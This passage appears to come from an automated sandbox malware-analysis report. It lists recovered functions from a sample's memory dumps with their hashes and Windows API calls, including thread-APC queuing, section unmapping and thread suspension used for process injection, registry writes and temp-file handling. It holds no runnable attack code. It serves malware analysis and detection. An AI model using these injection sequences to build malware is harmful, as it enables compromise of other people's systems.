    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
